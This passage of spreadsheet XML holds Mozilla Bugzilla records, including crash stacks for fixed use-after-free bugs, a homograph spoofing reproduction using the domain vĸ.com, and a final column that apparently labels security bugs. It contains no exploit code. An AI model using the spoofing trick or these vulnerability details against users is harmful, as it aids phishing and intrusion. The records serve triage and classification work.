          <t>[sec-moderate for Firefox][will be fixed in bug 1370866][sec-survey]	[post-critsmash-triage][adv-main99+][adv-esr91.8+]</t>
        </is>
      </c>
      <c r="Q4948" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4948" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4948" t="inlineStr">
        <is>
          <t>3.76</t>
        </is>
      </c>
      <c r="T4948" t="n">
        <v>1</v>
      </c>
      <c r="U4948" t="n">
        <v>0</v>
      </c>
      <c r="V4948" t="n">
        <v>22</v>
      </c>
      <c r="W4948" t="inlineStr">
        <is>
          <t>Long-term UAF, appears to go back to either 60 or 72.   Hopefully a duplicate.
Crash report: https://crash-stats.mozilla.org/report/index/7f2e9311-1197-45bb-a6a4-134c10211117
Reason: ```EXCEPTION_ACCESS_VIOLATION_READ```
Top 10 frames of crashing thread:
```
0 nss3.dll PR_Unlock nsprpub/pr/src/threads/combined/prulock.c:326
1 nss3.dll nssTokenObjectCache_FindObjectsByTemplate security/nss/lib/dev/devutil.c:736
2 nss3.dll nssToken_FindObjectsByTemplate security/nss/lib/dev/devtoken.c:412
3 nss3.dll nssToken_FindCertificateByIssuerAndSerialNumber security/nss/lib/dev/devtoken.c:832
4 nss3.dll nssTrustDomain_UpdateCachedTokenCerts security/nss/lib/pki/tdcache.c:474
5 nss3.dll PK11_DoPassword security/nss/lib/pk11wrap/pk11auth.c:640
6 nss3.dll PK11_Authenticate security/nss/lib/pk11wrap/pk11auth.c:324
7 xul.dll mozilla::psm::FindClientCertificatesWithPrivateKeys security/manager/ssl/nsNSSComponent.cpp:2684
8 xul.dll ClientAuthDataRunnable::RunOnTargetThread security/manager/ssl/nsNSSIOLayer.cpp:2317
9 xul.dll mozilla::psm::SyncRunnableBase::Run security/manager/ssl/PSMRunnable.cpp:31
```</t>
        </is>
      </c>
      <c r="X4948" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4949">
      <c r="A4949" t="n">
        <v>343573</v>
      </c>
      <c r="B4949" t="inlineStr">
        <is>
          <t>2006-07-04 10:29:47 -0700</t>
        </is>
      </c>
      <c r="C4949" t="inlineStr">
        <is>
          <t>Allow add-on developers limited use of HTML</t>
        </is>
      </c>
      <c r="D4949" t="inlineStr">
        <is>
          <t>2016-02-04 14:49:13 -0800</t>
        </is>
      </c>
      <c r="E4949" t="n">
        <v>1</v>
      </c>
      <c r="F4949" t="n">
        <v>1</v>
      </c>
      <c r="G4949" t="n">
        <v>6</v>
      </c>
      <c r="H4949" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4949" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J4949" t="inlineStr">
        <is>
          <t>Developer Pages</t>
        </is>
      </c>
      <c r="K4949" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L4949" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4949" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4949" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4949" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4949" t="inlineStr"/>
      <c r="Q4949" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4949" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4949" t="inlineStr">
        <is>
          <t>5.3</t>
        </is>
      </c>
      <c r="T4949" t="n">
        <v>1</v>
      </c>
      <c r="U4949" t="n">
        <v>1</v>
      </c>
      <c r="V4949" t="n">
        <v>49</v>
      </c>
      <c r="W4949" t="inlineStr">
        <is>
          <t>Add-on developers should be able to use some HTML. I'd suggest: 
&lt;a href="" title=""&gt; &lt;abbr title=""&gt; &lt;acronym title=""&gt; &lt;b&gt; &lt;blockquote cite=""&gt; &lt;code&gt; &lt;em&gt; &lt;i&gt; &lt;strike&gt; and &lt;strong&gt;
Would need some sanity checks to make sure they keep it valid and keep it clean (eg. don't put the whole thing in bold, have tags correctly nested, etc.)
Additionally, it would be great if we could automagically link stuff if someone just types http://mozilla.com
We're not trying to allow people to format it to death, but the complete lack of formatting makes shaver cry all the time -&gt; MAJOR</t>
        </is>
      </c>
      <c r="X4949" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4950">
      <c r="A4950" t="n">
        <v>1256009</v>
      </c>
      <c r="B4950" t="inlineStr">
        <is>
          <t>2016-03-12 09:48:45 -0800</t>
        </is>
      </c>
      <c r="C4950" t="inlineStr">
        <is>
          <t>(punycode) homograph attacks with Κʻ / ĸ (U+0138, *Kra*)</t>
        </is>
      </c>
      <c r="D4950" t="inlineStr">
        <is>
          <t>2019-07-02 17:38:54 -0700</t>
        </is>
      </c>
      <c r="E4950" t="n">
        <v>1</v>
      </c>
      <c r="F4950" t="n">
        <v>1</v>
      </c>
      <c r="G4950" t="n">
        <v>3</v>
      </c>
      <c r="H4950" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4950" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4950" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4950" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L4950" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4950" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4950" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4950" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4950" t="inlineStr">
        <is>
          <t>[necko-backlog][adv-main68+]</t>
        </is>
      </c>
      <c r="Q4950" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4950" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4950" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T4950" t="n">
        <v>1</v>
      </c>
      <c r="U4950" t="n">
        <v>2</v>
      </c>
      <c r="V4950" t="n">
        <v>18</v>
      </c>
      <c r="W4950" t="inlineStr">
        <is>
          <t>Created attachment 8729845
70a7f8e2c75f4e0c916cb587e56d39c8.png
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
Build ID: 20160303134406
Steps to reproduce:
Click on link with Unicode: Κʻ / ĸ (U+0138, *Kra*) instead of latin k.
Go to http://vĸ.com for example
Actual results:
Address bar shows this like unicode (vĸ.com)
Expected results:
Address bar should show this in punycode  (www.xn--v-tka.com)</t>
        </is>
      </c>
      <c r="X4950" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4951">
      <c r="A4951" t="n">
        <v>961347</v>
      </c>
      <c r="B4951" t="inlineStr">
        <is>
          <t>2014-01-17 20:57:39 -0800</t>
        </is>
      </c>
      <c r="C4951" t="inlineStr">
        <is>
          <t>Google translate can't expand its input area with large input</t>
        </is>
      </c>
      <c r="D4951" t="inlineStr">
        <is>
          <t>2019-11-18 05:32:39 -0800</t>
        </is>
      </c>
      <c r="E4951" t="n">
        <v>1</v>
      </c>
      <c r="F4951" t="n">
        <v>1</v>
      </c>
      <c r="G4951" t="n">
        <v>3</v>
      </c>
      <c r="H4951" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4951" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4951" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K4951" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4951" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4951" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4951" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4951" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4951" t="inlineStr"/>
      <c r="Q4951" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4951" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4951" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T4951" t="n">
        <v>1</v>
      </c>
      <c r="U4951" t="n">
        <v>0</v>
      </c>
      <c r="V4951" t="n">
        <v>23</v>
      </c>
      <c r="W4951" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 (Beta/Release)
Build ID: 20140117030207
Steps to reproduce:
On firefox 29 , when I input some contents into the input area of "google translate" 
https://translate.google.com/?hl=zh-TW&amp;tab=wT#en/zh-TW/  .
Actual results:
The input area of "google translate" can't expand automatically as the input contents size exceeds the original input area size.
Expected results:
The input area of "google translate" should expand automatically to accommodate and show all words of the input contents.</t>
        </is>
      </c>
      <c r="X4951" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4952">
      <c r="A4952" t="n">
        <v>839322</v>
      </c>
      <c r="B4952" t="inlineStr">
        <is>
          <t>2013-02-07 17:00:45 -0800</t>
        </is>
      </c>
      <c r="C4952" t="inlineStr">
        <is>
          <t>Release Add-on SDK 1.13.2 hotfix</t>
        </is>
      </c>
      <c r="D4952" t="inlineStr">
        <is>
          <t>2013-02-15 10:59:20 -0800</t>
        </is>
      </c>
      <c r="E4952" t="n">
        <v>1</v>
      </c>
      <c r="F4952" t="n">
        <v>1</v>
      </c>
      <c r="G4952" t="n">
        <v>6</v>
      </c>
      <c r="H4952" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4952" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J4952" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4952" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4952" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4952" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4952" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4952" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4952" t="inlineStr"/>
      <c r="Q4952" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4952" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4952" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4952" t="n">
        <v>1</v>
      </c>
      <c r="U4952" t="n">
        <v>0</v>
      </c>
      <c r="V4952" t="n">
        <v>4</v>
      </c>
      <c r="W4952" t="inlineStr">
        <is>
          <t>We're going to be releasing a hotfix to SDK 1.13.2 to pick up some more context-menu regressions</t>
        </is>
      </c>
      <c r="X4952" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4953">
      <c r="A4953" t="n">
        <v>25294</v>
      </c>
      <c r="B4953" t="inlineStr">
        <is>
          <t>2000-01-27 11:51:02 -0800</t>
        </is>
      </c>
      <c r="C4953" t="inlineStr">
        <is>
          <t>Forward Inline of an HTML message put the original body before the headers</t>
        </is>
      </c>
      <c r="D4953" t="inlineStr">
        <is>
          <t>2008-07-31 01:22:10 -0700</t>
        </is>
      </c>
      <c r="E4953" t="n">
        <v>1</v>
      </c>
      <c r="F4953" t="n">
        <v>1</v>
      </c>
      <c r="G4953" t="n">
        <v>3</v>
      </c>
      <c r="H4953" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4953" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4953" t="inlineStr">
        <is>
          <t>Composition</t>
        </is>
      </c>
      <c r="K4953" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4953" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4953" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4953" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4953" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4953" t="inlineStr">
        <is>
          <t>[PDT+] Expected landing date 02/13/99</t>
        </is>
      </c>
      <c r="Q4953" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4953" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4953" t="inlineStr">
        <is>
          <t>M14</t>
        </is>
      </c>
      <c r="T4953" t="n">
        <v>1</v>
      </c>
      <c r="U4953" t="n">
        <v>0</v>
      </c>
      <c r="V4953" t="n">
        <v>11</v>
      </c>
      <c r="W4953" t="inlineStr">
        <is>
          <t>When I forward INLINE an HTML message (messenger menu message/forward as/inline), the original body comes 
before the headers! That doesn't append with a plaintext message. Seems to be a problem with the editor shell API 
InsertSource.
Here is what we insert as source (editorShell-&gt;InsertSource()):
&lt;HTML&gt; &lt;BR&gt;&lt;BR&gt;
-------- Original Message --------
&lt;TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0&gt;
&lt;TR&gt;
	&lt;TH VALIGN=BASELINE ALIGN=RIGHT NOWRAP&gt;Subject: &lt;/TH&gt;
	&lt;TD&gt;testing again in html mode&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
	&lt;TH VALIGN=BASELINE ALIGN=RIGHT NOWRAP&gt;Date: &lt;/TH&gt;
	&lt;TD&gt;Fri, 21 Jan 2000 13:11:52 -0800&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
	&lt;TH VALIGN=BASELINE ALIGN=RIGHT NOWRAP&gt;From: &lt;/TH&gt;
	&lt;TD&gt;esther@netscape.com (Esther Goes)&lt;/TD&gt;
&lt;/TR&gt;
&lt;TR&gt;
	&lt;TH VALIGN=BASELINE ALIGN=RIGHT NOWRAP&gt;To: &lt;/TH&gt;
	&lt;TD&gt;Esther Goes &amp;lt;esther@netscape.com&gt;, qatest04@netscape.com,
	 3qatest07@netscape.com, qatest03@netscape.com,
	 3qatest08@netscape.com&lt;/TD&gt;
&lt;/TR&gt;
&lt;/TABLE&gt;
&lt;BR&gt;&lt;BR&gt;
&lt;head&gt;&lt;/head&gt;
&lt;body&gt;&lt;b&gt;testing&lt;/b&gt;&lt;/body&gt;
&lt;/html&gt;
and here is what we get:
&lt;html&gt;&lt;head&gt;&lt;/head&gt;
&lt;body&gt; &lt;br&gt;&lt;br&gt;-------- Original Message --------
&lt;br&gt;&lt;br&gt;&lt;b&gt;testing&lt;/b&gt;
&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tbody&gt;
&lt;tr&gt;
&lt;th valign="Baseline" align nowrap&gt;Subject: &lt;/th&gt;
&lt;td&gt;testing again in html mode&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th valign="Baseline" align nowrap&gt;Date: &lt;/th&gt;
&lt;td&gt;Fri, 21 Jan 2000 13:11:52 -0800&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th valign="Baseline" align nowrap&gt;From: &lt;/th&gt;
&lt;td&gt;esther@netscape.com (Esther Goes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th valign="Baseline" align nowrap&gt;To: &lt;/th&gt;
&lt;td&gt;Esther Goes &amp;lt;esther@netscape.com&amp;gt;, qatest04@netscape.com,
     3qatest07@netscape.com, qatest03@netscape.com,
     3qatest08@netscape.com&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="X4953" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4954">
      <c r="A4954" t="n">
        <v>1356824</v>
      </c>
      <c r="B4954" t="inlineStr">
        <is>
          <t>2017-04-15 11:20:01 -0700</t>
        </is>
      </c>
      <c r="C4954" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free WRITE of size 4 dom/indexedDB/ActorsParent.cpp:21164:10</t>
        </is>
      </c>
      <c r="D4954" t="inlineStr">
        <is>
          <t>2024-05-30 09:31:57 -0700</t>
        </is>
      </c>
      <c r="E4954" t="n">
        <v>1</v>
      </c>
      <c r="F4954" t="n">
        <v>1</v>
      </c>
      <c r="G4954" t="n">
        <v>3</v>
      </c>
      <c r="H4954" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4954" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4954" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K4954" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4954" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4954" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4954" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4954" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4954" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q4954" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4954" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4954" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4954" t="n">
        <v>1</v>
      </c>
      <c r="U4954" t="n">
        <v>0</v>
      </c>
      <c r="V4954" t="n">
        <v>56</v>
      </c>
      <c r="W4954" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3067.0 Safari/537.36
Steps to reproduce:
ASAN build 55.0a1 (2017-04-14) (64-bit)
I'm trying to identify how this exactly happens (please check if some duplicate issue), any help is appreciated. I can reproduce this issue multiple times, attached two stacktraces with latest Nightly ASAN build:
Actual results:
=================================================================
==8636==ERROR: AddressSanitizer: heap-use-after-free on address 0x614000668dc8 at pc 0x7ff0a2b32861 bp 0x7ff03c65c9d0 sp 0x7ff03c65c9c8
WRITE of size 4 at 0x614000668dc8 thread T38 (IPDL Background)
    #0 0x7ff0a2b32860 in mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp::FinishSendResults() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:21164:10
    #1 0x7ff0a2b352ea in mozilla::dom::indexedDB::(anonymous namespace)::DeleteDatabaseOp::SendResults() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:23283:3
    #2 0x7ff0a2a932af in mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp::Run() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:21556:7
    #3 0x7ff0a2b3305f in mozilla::dom::indexedDB::(anonymous namespace)::DeleteDatabaseOp::NoteDatabaseClosed(mozilla::dom::indexedDB::(anonymous namespace)::Database*) /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:23247:5
    #4 0x7ff0a2ab8b0f in CloseInternal /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:14495:30
    #5 0x7ff0a2ab8b0f in mozilla::dom::indexedDB::(anonymous namespace)::Database::RecvClose() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:14948
    #6 0x7ff09e420f24 in mozilla::dom::indexedDB::PBackgroundIDBDatabaseParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundIDBDatabaseParent.cpp:431:20
    #7 0x7ff09e590f57 in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundParent.cpp:904:28
    #8 0x7ff09e0cb124 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1903:25
    #9 0x7ff09e0c7957 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1838:17
    #10 0x7ff09e0c9d94 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1711:5
    #11 0x7ff09e0ca396 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1744:15
    #12 0x7ff09d3104f0 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #13 0x7ff09d30cf38 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #14 0x7ff09e0d3bff in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:368:5
    #15 0x7ff09e039070 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #16 0x7ff09e039070 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #17 0x7ff09e039070 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #18 0x7ff09d30991f in nsThread::ThreadFunc(void*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:500:11
    #19 0x7ff0b6ad8c93 in _pt_root /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #20 0x7ff0ba3d66c9 in start_thread (/lib64/libpthread.so.0+0x76c9)
    #21 0x7ff0b945cf7e in __GI___clone (/lib64/libc.so.6+0x107f7e)
0x614000668dc8 is located 392 bytes inside of 448-byte region [0x614000668c40,0x614000668e00)
freed by thread T38 (IPDL Background) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7ff09d31a093 in mozilla::Runnable::Release() /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:40:1
    #2 0x7ff0a2b326c2 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:40:11
    #3 0x7ff0a2b326c2 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:395
    #4 0x7ff0a2b326c2 in ~RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:78
    #5 0x7ff0a2b326c2 in Destruct /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:560
    #6 0x7ff0a2b326c2 in DestructRange /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2007
    #7 0x7ff0a2b326c2 in RemoveElementsAt /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2055
    #8 0x7ff0a2b326c2 in RemoveElementAt /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1730
    #9 0x7ff0a2b326c2 in RemoveElement&lt;mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp *, nsDefaultComparator&lt;RefPtr&lt;mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp&gt;, mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp *&gt; &gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1756
    #10 0x7ff0a2b326c2 in RemoveElement&lt;mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1765
    #11 0x7ff0a2b326c2 in mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp::FinishSendResults() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:21158
    #12 0x7ff0a2b352ea in mozilla::dom::indexedDB::(anonymous namespace)::DeleteDatabaseOp::SendResults() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:23283:3
    #13 0x7ff0a2a932af in mozilla::dom::indexedDB::(anonymous namespace)::FactoryOp::Run() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:21556:7
    #14 0x7ff0a2b3305f in mozilla::dom::indexedDB::(anonymous namespace)::DeleteDatabaseOp::NoteDatabaseClosed(mozilla::dom::indexedDB::(anonymous namespace)::Database*) /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:23247:5
    #15 0x7ff0a2ab8b0f in CloseInternal /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:14495:30
    #16 0x7ff0a2ab8b0f in mozilla::dom::indexedDB::(anonymous namespace)::Database::RecvClose() /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:14948
    #17 0x7ff09e420f24 in mozilla::dom::indexedDB::PBackgroundIDBDatabaseParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundIDBDatabaseParent.cpp:431:20
    #18 0x7ff09e590f57 in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundParent.cpp:904:28
    #19 0x7ff09e0cb124 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1903:25
    #20 0x7ff09e0c7957 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1838:17
    #21 0x7ff09e0c9d94 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1711:5
    #22 0x7ff09e0ca396 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1744:15
    #23 0x7ff09d3104f0 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #24 0x7ff09d30cf38 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #25 0x7ff09e0d3bff in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:368:5
    #26 0x7ff09e039070 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #27 0x7ff09e039070 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #28 0x7ff09e039070 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #29 0x7ff09d30991f in nsThread::ThreadFunc(void*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:500:11
    #30 0x7ff0b6ad8c93 in _pt_root /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #31 0x7ff0ba3d66c9 in start_thread (/lib64/libpthread.so.0+0x76c9)
previously allocated by thread T38 (IPDL Background) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7ff0a2a917dc in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7ff0a2a917dc in mozilla::dom::indexedDB::(anonymous namespace)::Factory::AllocPBackgroundIDBFactoryRequestParent(mozilla::dom::indexedDB::FactoryRequestParams const&amp;) /home/worker/workspace/build/src/dom/indexedDB/ActorsParent.cpp:14056
    #4 0x7ff09e540623 in mozilla::dom::indexedDB::PBackgroundIDBFactoryParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundIDBFactoryParent.cpp:234:21
    #5 0x7ff09e590f57 in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundParent.cpp:904:28
    #6 0x7ff09e0cb124 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1903:25
    #7 0x7ff09e0c7957 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1838:17
    #8 0x7ff09e0c9d94 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1711:5
    #9 0x7ff09e0ca396 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1744:15
    #10 0x7ff09d3104f0 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
